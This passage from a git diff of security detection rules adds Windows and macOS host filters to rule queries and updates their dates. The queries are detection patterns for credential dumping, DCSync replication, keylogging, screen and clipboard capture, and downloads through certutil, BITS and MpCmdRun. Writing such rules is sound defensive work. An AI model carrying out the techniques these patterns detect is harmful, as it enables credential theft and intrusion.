host.os.type:macos and event.type:(start or process_started) and process.name:(dscl or dseditgroup) and process.args:(("/Groups/admin" or admin) and ("-a" or "-append")) ''' diff --git a/rules/macos/privilege_escalation_root_crontab_filemod.toml b/rules/macos/privilege_escalation_root_crontab_filemod.toml index 4d8da16c0..1d5ed5594 100644 --- a/rules/macos/privilege_escalation_root_crontab_filemod.toml +++ b/rules/macos/privilege_escalation_root_crontab_filemod.toml @@ -4,7 +4,7 @@ integration = ["endpoint"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2022/12/14" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -29,7 +29,7 @@ timestamp_override = "event.ingested" type = "query" query = ''' -event.category:file and not event.type:deletion and +event.category:file and host.os.type:macos and not event.type:deletion and file.path:/private/var/at/tabs/root and not process.executable:/usr/bin/crontab ''' diff --git a/rules/windows/lateral_movement_dns_server_overflow.toml b/rules/network/lateral_movement_dns_server_overflow.toml similarity index 100% rename from rules/windows/lateral_movement_dns_server_overflow.toml rename to rules/network/lateral_movement_dns_server_overflow.toml diff --git a/rules/windows/collection_email_outlook_mailbox_via_com.toml b/rules/windows/collection_email_outlook_mailbox_via_com.toml index 8cdefbd39..5936ed883 100644 --- a/rules/windows/collection_email_outlook_mailbox_via_com.toml +++ b/rules/windows/collection_email_outlook_mailbox_via_com.toml @@ -4,7 +4,7 @@ integration = ["endpoint"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.4.0" -updated_date = "2023/02/01" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -28,7 +28,7 @@ timestamp_override = "event.ingested" type = "eql" query = ''' -process where event.action == "start" and process.name : "OUTLOOK.EXE" and +process where host.os.type == "windows" and event.action == "start" and process.name : "OUTLOOK.EXE" and process.Ext.effective_parent.name != null and not process.Ext.effective_parent.executable : ("?:\\Program Files\\*", "?:\\Program Files (x86)\\*") ''' diff --git a/rules/windows/collection_email_powershell_exchange_mailbox.toml b/rules/windows/collection_email_powershell_exchange_mailbox.toml index 0b190559d..4de8f0f29 100644 --- a/rules/windows/collection_email_powershell_exchange_mailbox.toml +++ b/rules/windows/collection_email_powershell_exchange_mailbox.toml @@ -4,7 +4,7 @@ integration = ["endpoint", "windows"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2023/01/11" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -75,7 +75,7 @@ timestamp_override = "event.ingested" type = "eql" query = ''' -process where event.type == "start" and +process where host.os.type == "windows" and event.type == "start" and process.name: ("powershell.exe", "pwsh.exe", "powershell_ise.exe") and process.command_line : ("*MailboxExportRequest*", "*-Mailbox*-ContentFilter*") ''' diff --git a/rules/windows/collection_mailbox_export_winlog.toml b/rules/windows/collection_mailbox_export_winlog.toml index 01cb1fd6d..4ed68053b 100644 --- a/rules/windows/collection_mailbox_export_winlog.toml +++ b/rules/windows/collection_mailbox_export_winlog.toml @@ -4,7 +4,7 @@ integration = ["windows"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2023/01/11" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -68,7 +68,7 @@ timestamp_override = "event.ingested" type = "query" query = ''' -event.category:process and powershell.file.script_block_text : "New-MailboxExportRequest" +event.category:process and host.os.type:windows and powershell.file.script_block_text : "New-MailboxExportRequest" ''' diff --git a/rules/windows/collection_posh_audio_capture.toml b/rules/windows/collection_posh_audio_capture.toml index 9a694b23b..25c5cf204 100644 --- a/rules/windows/collection_posh_audio_capture.toml +++ b/rules/windows/collection_posh_audio_capture.toml @@ -4,7 +4,7 @@ integration = ["windows"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2023/01/05" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -80,7 +80,7 @@ timestamp_override = "event.ingested" type = "query" query = ''' -event.category:process and +event.category:process and host.os.type:windows and powershell.file.script_block_text : ( "Get-MicrophoneAudio" or (waveInGetNumDevs and mciSendStringA) ) and not user.id : "S-1-5-18" diff --git a/rules/windows/collection_posh_clipboard_capture.toml b/rules/windows/collection_posh_clipboard_capture.toml index 07d7de79b..afef1c8bc 100644 --- a/rules/windows/collection_posh_clipboard_capture.toml +++ b/rules/windows/collection_posh_clipboard_capture.toml @@ -4,7 +4,7 @@ integration = ["windows"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2023/02/06" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -85,7 +85,7 @@ timestamp_override = "event.ingested" type = "query" query = ''' -event.category:process and +event.category:process and host.os.type:windows and (powershell.file.script_block_text : ( "Windows.Clipboard" or "Windows.Forms.Clipboard" or diff --git a/rules/windows/collection_posh_keylogger.toml b/rules/windows/collection_posh_keylogger.toml index 5c316e75f..9b4215d97 100644 --- a/rules/windows/collection_posh_keylogger.toml +++ b/rules/windows/collection_posh_keylogger.toml @@ -4,7 +4,7 @@ integration = ["windows"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2023/01/05" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -85,7 +85,7 @@ timestamp_override = "event.ingested" type = "query" query = ''' -event.category:process and +event.category:process and host.os.type:windows and ( powershell.file.script_block_text : (GetAsyncKeyState or NtUserGetAsyncKeyState or GetKeyboardState or "Get-Keystrokes") or powershell.file.script_block_text : ( diff --git a/rules/windows/collection_posh_mailbox.toml b/rules/windows/collection_posh_mailbox.toml index 7f6024152..4ec04bb57 100644 --- a/rules/windows/collection_posh_mailbox.toml +++ b/rules/windows/collection_posh_mailbox.toml @@ -4,7 +4,7 @@ integration = ["windows"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2023/02/06" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -86,7 +86,7 @@ timestamp_override = "event.ingested" type = "query" query = ''' -event.category:process and +event.category:process and host.os.type:windows and ( powershell.file.script_block_text : ( "Microsoft.Office.Interop.Outlook" or diff --git a/rules/windows/collection_posh_screen_grabber.toml b/rules/windows/collection_posh_screen_grabber.toml index ee0e6e1f4..15393e8c4 100644 --- a/rules/windows/collection_posh_screen_grabber.toml +++ b/rules/windows/collection_posh_screen_grabber.toml @@ -4,7 +4,7 @@ integration = ["windows"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2023/01/05" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -81,7 +81,7 @@ timestamp_override = "event.ingested" type = "query" query = ''' -event.category:process and +event.category:process and host.os.type:windows and powershell.file.script_block_text : ( CopyFromScreen and ("System.Drawing.Bitmap" or "Drawing.Bitmap") diff --git a/rules/windows/collection_winrar_encryption.toml b/rules/windows/collection_winrar_encryption.toml index 1a5b7fda4..245955fdf 100644 --- a/rules/windows/collection_winrar_encryption.toml +++ b/rules/windows/collection_winrar_encryption.toml @@ -4,7 +4,7 @@ integration = ["endpoint", "windows"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2023/01/19" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -63,7 +63,7 @@ timestamp_override = "event.ingested" type = "eql" query = ''' -process where event.type == "start" and +process where host.os.type == "windows" and event.type == "start" and ( ((process.name:"rar.exe" or process.code_signature.subject_name == "win.rar GmbH" or process.pe.original_file_name == "Command line RAR") and diff --git a/rules/windows/command_and_control_certreq_postdata.toml b/rules/windows/command_and_control_certreq_postdata.toml index 3ff3efb40..58b39d23a 100644 --- a/rules/windows/command_and_control_certreq_postdata.toml +++ b/rules/windows/command_and_control_certreq_postdata.toml @@ -4,7 +4,7 @@ integration = ["endpoint", "windows"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2023/01/13" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -25,7 +25,7 @@ timestamp_override = "event.ingested" type = "eql" query = ''' -process where event.type == "start" and +process where host.os.type == "windows" and event.type == "start" and (process.name : "CertReq.exe" or process.pe.original_file_name == "CertReq.exe") and process.args : "-Post" ''' diff --git a/rules/windows/command_and_control_certutil_network_connection.toml b/rules/windows/command_and_control_certutil_network_connection.toml index dbb734d06..68c7719f9 100644 --- a/rules/windows/command_and_control_certutil_network_connection.toml +++ b/rules/windows/command_and_control_certutil_network_connection.toml @@ -2,7 +2,7 @@ creation_date = "2020/03/19" integration = ["endpoint", "windows"] maturity = "production" -updated_date = "2023/01/31" +updated_date = "2023/02/22" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" @@ -80,8 +80,8 @@ type = "eql" query = ''' sequence by process.entity_id - [process where process.name : "certutil.exe" and event.type == "start"] - [network where process.name : "certutil.exe" and + [process where host.os.type == "windows" and process.name : "certutil.exe" and event.type == "start"] + [network where host.os.type == "windows" and process.name : "certutil.exe" and not cidrmatch(destination.ip, "10.0.0.0/8", "127.0.0.0/8", "169.254.0.0/16", "172.16.0.0/12", "192.0.0.0/24", "192.0.0.0/29", "192.0.0.8/32", "192.0.0.9/32", "192.0.0.10/32", "192.0.0.170/32", "192.0.0.171/32", "192.0.2.0/24", "192.31.196.0/24", "192.52.193.0/24", diff --git a/rules/windows/command_and_control_common_webservices.toml b/rules/windows/command_and_control_common_webservices.toml index ddbb7f62d..538a0e037 100644 --- a/rules/windows/command_and_control_common_webservices.toml +++ b/rules/windows/command_and_control_common_webservices.toml @@ -2,7 +2,7 @@ creation_date = "2020/11/04" integration = ["endpoint"] maturity = "production" -updated_date = "2023/01/31" +updated_date = "2023/02/22" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" @@ -77,7 +77,7 @@ timestamp_override = "event.ingested" type = "eql" query = ''' -network where network.protocol == "dns" and +network where host.os.type == "windows" and network.protocol == "dns" and process.name != null and user.id not in ("S-1-5-18", "S-1-5-19", "S-1-5-20") and /* Add new WebSvc domains here */ dns.question.name : diff --git a/rules/windows/command_and_control_dns_tunneling_nslookup.toml b/rules/windows/command_and_control_dns_tunneling_nslookup.toml index d10a39210..3acfbd999 100644 --- a/rules/windows/command_and_control_dns_tunneling_nslookup.toml +++ b/rules/windows/command_and_control_dns_tunneling_nslookup.toml @@ -4,7 +4,7 @@ integration = ["endpoint", "windows"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2022/12/14" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -67,7 +67,7 @@ tags = [ type = "threshold" query = ''' -event.category:process and event.type:start and process.name:nslookup.exe and process.args:(-querytype=* or -qt=* or -q=* or -type=*) +event.category:process and host.os.type:windows and event.type:start and process.name:nslookup.exe and process.args:(-querytype=* or -qt=* or -q=* or -type=*) ''' diff --git a/rules/windows/command_and_control_encrypted_channel_freesslcert.toml b/rules/windows/command_and_control_encrypted_channel_freesslcert.toml index c8be1c05b..8b5265fa5 100644 --- a/rules/windows/command_and_control_encrypted_channel_freesslcert.toml +++ b/rules/windows/command_and_control_encrypted_channel_freesslcert.toml @@ -4,7 +4,7 @@ integration = ["endpoint", "windows"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2022/12/14" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -29,7 +29,7 @@ timestamp_override = "event.ingested" type = "eql" query = ''' -network where network.protocol == "dns" and +network where host.os.type == "windows" and network.protocol == "dns" and /* Add new free SSL certificate provider domains here */ dns.question.name : ("*letsencrypt.org", "*.sslforfree.com", "*.zerossl.com", "*.freessl.org") and diff --git a/rules/windows/command_and_control_iexplore_via_com.toml b/rules/windows/command_and_control_iexplore_via_com.toml index 298fccd02..b4ba60b9a 100644 --- a/rules/windows/command_and_control_iexplore_via_com.toml +++ b/rules/windows/command_and_control_iexplore_via_com.toml @@ -4,7 +4,7 @@ integration = ["endpoint", "windows"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2022/12/14" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -27,10 +27,10 @@ type = "eql" query = ''' sequence by host.id, user.name with maxspan = 5s - [library where dll.name : "IEProxy.dll" and process.name : ("rundll32.exe", "regsvr32.exe")] - [process where event.type == "start" and process.parent.name : "iexplore.exe" and process.parent.args : "-Embedding"] + [library where host.os.type == "windows" and dll.name : "IEProxy.dll" and process.name : ("rundll32.exe", "regsvr32.exe")] + [process where host.os.type == "windows" and event.type == "start" and process.parent.name : "iexplore.exe" and process.parent.args : "-Embedding"] /* IE started via COM in normal conditions makes few connections, mainly to Microsoft and OCSP related domains, add FPs here */ - [network where network.protocol == "dns" and process.name : "iexplore.exe" and + [network where host.os.type == "windows" and network.protocol == "dns" and process.name : "iexplore.exe" and not dns.question.name : ( "*.microsoft.com", diff --git a/rules/windows/command_and_control_ingress_transfer_bits.toml b/rules/windows/command_and_control_ingress_transfer_bits.toml index 1aa4bae96..72473be29 100644 --- a/rules/windows/command_and_control_ingress_transfer_bits.toml +++ b/rules/windows/command_and_control_ingress_transfer_bits.toml @@ -4,7 +4,7 @@ integration = ["endpoint"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2023/01/13" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -26,7 +26,7 @@ timestamp_override = "event.ingested" type = "eql" query = ''' -file where event.action == "rename" and +file where host.os.type == "windows" and event.action == "rename" and process.name : "svchost.exe" and file.Ext.original.name : "BIT*.tmp" and (file.extension :("exe", "zip", "rar", "bat", "dll", "ps1", "vbs", "wsh", "js", "vbe", "pif", "scr", "cmd", "cpl") or file.Ext.header_bytes : "4d5a*") and diff --git a/rules/windows/command_and_control_port_forwarding_added_registry.toml b/rules/windows/command_and_control_port_forwarding_added_registry.toml index 63d9f4112..223897fc8 100644 --- a/rules/windows/command_and_control_port_forwarding_added_registry.toml +++ b/rules/windows/command_and_control_port_forwarding_added_registry.toml @@ -4,7 +4,7 @@ integration = ["endpoint", "windows"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2022/12/14" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -82,7 +82,7 @@ timestamp_override = "event.ingested" type = "eql" query = ''' -registry where registry.path : ( +registry where host.os.type == "windows" and registry.path : ( "HKLM\\SYSTEM\\*ControlSet*\\Services\\PortProxy\\v4tov4\\*", "\\REGISTRY\\MACHINE\\SYSTEM\\*ControlSet*\\Services\\PortProxy\\v4tov4\\*" ) diff --git a/rules/windows/command_and_control_rdp_tunnel_plink.toml b/rules/windows/command_and_control_rdp_tunnel_plink.toml index 41accac3d..c9924f419 100644 --- a/rules/windows/command_and_control_rdp_tunnel_plink.toml +++ b/rules/windows/command_and_control_rdp_tunnel_plink.toml @@ -4,7 +4,7 @@ integration = ["endpoint", "windows"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2022/12/14" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -73,7 +73,7 @@ timestamp_override = "event.ingested" type = "eql" query = ''' -process where event.type == "start" and +process where host.os.type == "windows" and event.type == "start" and /* RDP port and usual SSH tunneling related switches in command line */ process.args : "*:3389" and process.args : ("-L", "-P", "-R", "-pw", "-ssh") diff --git a/rules/windows/command_and_control_remote_file_copy_desktopimgdownldr.toml b/rules/windows/command_and_control_remote_file_copy_desktopimgdownldr.toml index 7bc07c622..f97c5d38e 100644 --- a/rules/windows/command_and_control_remote_file_copy_desktopimgdownldr.toml +++ b/rules/windows/command_and_control_remote_file_copy_desktopimgdownldr.toml @@ -2,7 +2,7 @@ creation_date = "2020/09/03" integration = ["endpoint", "windows"] maturity = "production" -updated_date = "2023/01/31" +updated_date = "2023/02/22" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" @@ -93,7 +93,7 @@ timestamp_override = "event.ingested" type = "eql" query = ''' -process where event.type == "start" and +process where host.os.type == "windows" and event.type == "start" and (process.name : "desktopimgdownldr.exe" or process.pe.original_file_name == "desktopimgdownldr.exe") and process.args : "/lockscreenurl:http*" ''' diff --git a/rules/windows/command_and_control_remote_file_copy_mpcmdrun.toml b/rules/windows/command_and_control_remote_file_copy_mpcmdrun.toml index 20f984d74..92f392bbe 100644 --- a/rules/windows/command_and_control_remote_file_copy_mpcmdrun.toml +++ b/rules/windows/command_and_control_remote_file_copy_mpcmdrun.toml @@ -2,7 +2,7 @@ creation_date = "2020/09/03" integration = ["endpoint", "windows"] maturity = "production" -updated_date = "2023/01/31" +updated_date = "2023/02/22" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" @@ -90,7 +90,7 @@ timestamp_override = "event.ingested" type = "eql" query = ''' -process where event.type == "start" and +process where host.os.type == "windows" and event.type == "start" and (process.name : "MpCmdRun.exe" or process.pe.original_file_name == "MpCmdRun.exe") and process.args : "-DownloadFile" and process.args : "-url" and process.args : "-path" ''' diff --git a/rules/windows/command_and_control_remote_file_copy_powershell.toml b/rules/windows/command_and_control_remote_file_copy_powershell.toml index e42e94a15..9aa6a93bd 100644 --- a/rules/windows/command_and_control_remote_file_copy_powershell.toml +++ b/rules/windows/command_and_control_remote_file_copy_powershell.toml @@ -2,7 +2,7 @@ creation_date = "2020/11/30" integration = ["endpoint", "windows"] maturity = "production" -updated_date = "2023/01/31" +updated_date = "2023/02/22" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" @@ -74,10 +74,10 @@ type = "eql" query = ''' sequence by host.id, process.entity_id with maxspan=30s - [network where process.name : ("powershell.exe", "pwsh.exe", "powershell_ise.exe") and network.protocol == "dns" and + [network where host.os.type == "windows" and process.name : ("powershell.exe", "pwsh.exe", "powershell_ise.exe") and network.protocol == "dns" and not dns.question.name : ("localhost", "*.microsoft.com", "*.azureedge.net", "*.powershellgallery.com", "*.windowsupdate.com", "metadata.google.internal") and not user.domain : "NT AUTHORITY"] - [file where process.name : "powershell.exe" and event.type == "creation" and file.extension : ("exe", "dll", "ps1", "bat") and + [file where host.os.type == "windows" and process.name : "powershell.exe" and event.type == "creation" and file.extension : ("exe", "dll", "ps1", "bat") and not file.name : "__PSScriptPolicy*.ps1"] ''' diff --git a/rules/windows/command_and_control_remote_file_copy_scripts.toml b/rules/windows/command_and_control_remote_file_copy_scripts.toml index 2dd64b4ff..7618f6ed3 100644 --- a/rules/windows/command_and_control_remote_file_copy_scripts.toml +++ b/rules/windows/command_and_control_remote_file_copy_scripts.toml @@ -2,7 +2,7 @@ creation_date = "2020/11/29" integration = ["endpoint", "windows"] maturity = "production" -updated_date = "2023/01/31" +updated_date = "2023/02/22" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" @@ -75,10 +75,10 @@ type = "eql" query = ''' sequence by host.id, process.entity_id - [network where process.name : ("wscript.exe", "cscript.exe") and network.protocol != "dns" and + [network where host.os.type == "windows" and process.name : ("wscript.exe", "cscript.exe") and network.protocol != "dns" and network.direction : ("outgoing", "egress") and network.type == "ipv4" and destination.ip != "127.0.0.1" ] - [file where event.type == "creation" and file.extension : ("exe", "dll")] + [file where host.os.type == "windows" and event.type == "creation" and file.extension : ("exe", "dll")] ''' diff --git a/rules/windows/command_and_control_sunburst_c2_activity_detected.toml b/rules/windows/command_and_control_sunburst_c2_activity_detected.toml index 3191d0ce0..0a61052e0 100644 --- a/rules/windows/command_and_control_sunburst_c2_activity_detected.toml +++ b/rules/windows/command_and_control_sunburst_c2_activity_detected.toml @@ -2,7 +2,7 @@ creation_date = "2020/12/14" integration = ["endpoint"] maturity = "production" -updated_date = "2023/01/31" +updated_date = "2023/02/22" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" @@ -78,7 +78,7 @@ timestamp_override = "event.ingested" type = "eql" query = ''' -network where event.type == "protocol" and network.protocol == "http" and +network where host.os.type == "windows" and event.type == "protocol" and network.protocol == "http" and process.name : ("ConfigurationWizard.exe", "NetFlowService.exe", "NetflowDatabaseMaintenance.exe", diff --git a/rules/windows/command_and_control_teamviewer_remote_file_copy.toml b/rules/windows/command_and_control_teamviewer_remote_file_copy.toml index 8021435f0..558c5f5f0 100644 --- a/rules/windows/command_and_control_teamviewer_remote_file_copy.toml +++ b/rules/windows/command_and_control_teamviewer_remote_file_copy.toml @@ -2,7 +2,7 @@ creation_date = "2020/09/02" integration = ["endpoint", "windows"] maturity = "production" -updated_date = "2023/01/31" +updated_date = "2023/02/22" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" @@ -86,7 +86,7 @@ timestamp_override = "event.ingested" type = "eql" query = ''' -file where event.type == "creation" and process.name : "TeamViewer.exe" and +file where host.os.type == "windows" and event.type == "creation" and process.name : "TeamViewer.exe" and file.extension : ("exe", "dll", "scr", "com", "bat", "ps1", "vbs", "vbe", "js", "wsh", "hta") ''' diff --git a/rules/windows/credential_access_bruteforce_admin_account.toml b/rules/windows/credential_access_bruteforce_admin_account.toml index 3567483e8..d3fa2abc9 100644 --- a/rules/windows/credential_access_bruteforce_admin_account.toml +++ b/rules/windows/credential_access_bruteforce_admin_account.toml @@ -4,7 +4,7 @@ integration = ["system", "windows"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2023/02/09" +updated_date = "2023/03/02" [rule] author = ["Elastic"] @@ -80,7 +80,7 @@ type = "eql" query = ''' sequence by winlog.computer_name, source.ip with maxspan=10s - [authentication where event.action == "logon-failed" and + [authentication where host.os.type == "windows" and event.action == "logon-failed" and winlog.logon.type : "Network" and source.ip != null and source.ip != "127.0.0.1" and source.ip != "::1" and user.name : "*admin*" and diff --git a/rules/windows/credential_access_bruteforce_multiple_logon_failure_followed_by_success.toml b/rules/windows/credential_access_bruteforce_multiple_logon_failure_followed_by_success.toml index 2ee1edfbc..62e4d75a4 100644 --- a/rules/windows/credential_access_bruteforce_multiple_logon_failure_followed_by_success.toml +++ b/rules/windows/credential_access_bruteforce_multiple_logon_failure_followed_by_success.toml @@ -4,7 +4,7 @@ integration = ["system", "windows"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2023/02/09" +updated_date = "2023/03/02" [rule] author = ["Elastic"] @@ -84,7 +84,7 @@ type = "eql" query = ''' sequence by winlog.computer_name, source.ip with maxspan=5s - [authentication where event.action == "logon-failed" and + [authentication where host.os.type == "windows" and event.action == "logon-failed" and /* event 4625 need to be logged */ winlog.logon.type : "Network" and source.ip != null and source.ip != "127.0.0.1" and source.ip != "::1" and @@ -92,7 +92,7 @@ sequence by winlog.computer_name, source.ip with maxspan=5s /* noisy failure status codes often associated to authentication misconfiguration */ not winlog.event_data.Status : ("0xC000015B", "0XC000005E", "0XC0000133", "0XC0000192")] with runs=5 - [authentication where event.action == "logged-in" and + [authentication where host.os.type == "windows" and event.action == "logged-in" and /* event 4624 need to be logged */ winlog.logon.type : "Network" and source.ip != null and source.ip != "127.0.0.1" and source.ip != "::1" and diff --git a/rules/windows/credential_access_bruteforce_multiple_logon_failure_same_srcip.toml b/rules/windows/credential_access_bruteforce_multiple_logon_failure_same_srcip.toml index f8489c305..fa5c8bf4d 100644 --- a/rules/windows/credential_access_bruteforce_multiple_logon_failure_same_srcip.toml +++ b/rules/windows/credential_access_bruteforce_multiple_logon_failure_same_srcip.toml @@ -4,7 +4,7 @@ integration = ["system", "windows"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2023/02/09" +updated_date = "2023/03/02" [rule] author = ["Elastic"] @@ -85,7 +85,7 @@ type = "eql" query = ''' sequence by winlog.computer_name, source.ip with maxspan=10s - [authentication where event.action == "logon-failed" and + [authentication where host.os.type == "windows" and event.action == "logon-failed" and /* event 4625 need to be logged */ winlog.logon.type : "Network" and source.ip != null and source.ip != "127.0.0.1" and source.ip != "::1" and diff --git a/rules/windows/credential_access_cmdline_dump_tool.toml b/rules/windows/credential_access_cmdline_dump_tool.toml index d45678412..ebe40934f 100644 --- a/rules/windows/credential_access_cmdline_dump_tool.toml +++ b/rules/windows/credential_access_cmdline_dump_tool.toml @@ -4,7 +4,7 @@ integration = ["endpoint", "windows"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2023/01/19" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -72,7 +72,7 @@ timestamp_override = "event.ingested" type = "eql" query = ''' -process where event.type == "start" and +process where host.os.type == "windows" and event.type == "start" and ( /* update here with any new lolbas with dump capability */ (process.pe.original_file_name == "procdump" and process.args : "-ma") or diff --git a/rules/windows/credential_access_copy_ntds_sam_volshadowcp_cmdline.toml b/rules/windows/credential_access_copy_ntds_sam_volshadowcp_cmdline.toml index c82366a01..873b1d42b 100644 --- a/rules/windows/credential_access_copy_ntds_sam_volshadowcp_cmdline.toml +++ b/rules/windows/credential_access_copy_ntds_sam_volshadowcp_cmdline.toml @@ -4,7 +4,7 @@ integration = ["endpoint", "windows"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2022/12/14" +updated_date = "2023/02/22" [rule] author = ["Elastic", "Austin Songer"] @@ -35,7 +35,7 @@ timestamp_override = "event.ingested" type = "eql" query = ''' -process where event.type == "start" and +process where host.os.type == "windows" and event.type == "start" and ( (process.pe.original_file_name in ("Cmd.Exe", "PowerShell.EXE", "XCOPY.EXE") and process.args : ("copy", "xcopy", "Copy-Item", "move", "cp", "mv") diff --git a/rules/windows/credential_access_credential_dumping_msbuild.toml b/rules/windows/credential_access_credential_dumping_msbuild.toml index e9887f421..05b86d3db 100644 --- a/rules/windows/credential_access_credential_dumping_msbuild.toml +++ b/rules/windows/credential_access_credential_dumping_msbuild.toml @@ -2,7 +2,7 @@ creation_date = "2020/03/25" integration = ["endpoint", "windows"] maturity = "production" -updated_date = "2023/01/31" +updated_date = "2023/02/22" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" @@ -79,8 +79,8 @@ type = "eql" query = ''' sequence by process.entity_id - [process where event.type == "start" and (process.name : "MSBuild.exe" or process.pe.original_file_name == "MSBuild.exe")] - [any where (event.category == "library" or (event.category == "process" and event.action : "Image loaded*")) and + [process where host.os.type == "windows" and event.type == "start" and (process.name : "MSBuild.exe" or process.pe.original_file_name == "MSBuild.exe")] + [any where host.os.type == "windows" and (event.category == "library" or (event.category == "process" and event.action : "Image loaded*")) and (dll.name : ("vaultcli.dll", "SAMLib.DLL") or file.name : ("vaultcli.dll", "SAMLib.DLL"))] ''' diff --git a/rules/windows/credential_access_dcsync_newterm_subjectuser.toml b/rules/windows/credential_access_dcsync_newterm_subjectuser.toml index 22df74f73..1afde324d 100644 --- a/rules/windows/credential_access_dcsync_newterm_subjectuser.toml +++ b/rules/windows/credential_access_dcsync_newterm_subjectuser.toml @@ -4,7 +4,7 @@ integration = ["windows"] maturity = "production" min_stack_comments = "The New Term rule type used in this rule was added in Elastic 8.4" min_stack_version = "8.4.0" -updated_date = "2023/02/01" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -52,9 +52,11 @@ timestamp_override = "event.ingested" type = "new_terms" query = ''' -event.action : "Directory Service Access" and event.code : "4662" and - winlog.event_data.Properties : (*DS-Replication-Get-Changes* or *DS-Replication-Get-Changes-All* or *DS-Replication-Get-Changes-In-Filtered-Set* or *1131f6ad-9c07-11d1-f79f-00c04fc2dcd2* or *1131f6aa-9c07-11d1-f79f-00c04fc2dcd2* or *89e95b76-444d-4c62-991a-0facbeda640c*) and - not winlog.event_data.SubjectUserName : (*$ or MSOL_*) +event.action:"Directory Service Access" and host.os.type:windows and event.code:"4662" and + winlog.event_data.Properties:(*DS-Replication-Get-Changes* or *DS-Replication-Get-Changes-All* or + *DS-Replication-Get-Changes-In-Filtered-Set* or *1131f6ad-9c07-11d1-f79f-00c04fc2dcd2* or + *1131f6aa-9c07-11d1-f79f-00c04fc2dcd2* or *89e95b76-444d-4c62-991a-0facbeda640c*) and + not winlog.event_data.SubjectUserName:(*$ or MSOL_*) ''' diff --git a/rules/windows/credential_access_dcsync_replication_rights.toml b/rules/windows/credential_access_dcsync_replication_rights.toml index adff31ae1..9b685c303 100644 --- a/rules/windows/credential_access_dcsync_replication_rights.toml +++ b/rules/windows/credential_access_dcsync_replication_rights.toml @@ -4,7 +4,7 @@ integration = ["system", "windows"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2023/02/01" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -98,7 +98,7 @@ timestamp_override = "event.ingested" type = "eql" query = ''' -any where event.action == "Directory Service Access" and +any where host.os.type == "windows" and event.action == "Directory Service Access" and event.code == "4662" and winlog.event_data.Properties : ( /* Control Access Rights/Permissions Symbol */ diff --git a/rules/windows/credential_access_disable_kerberos_preauth.toml b/rules/windows/credential_access_disable_kerberos_preauth.toml index 3735f99e1..b28249837 100644 --- a/rules/windows/credential_access_disable_kerberos_preauth.toml +++ b/rules/windows/credential_access_disable_kerberos_preauth.toml @@ -4,7 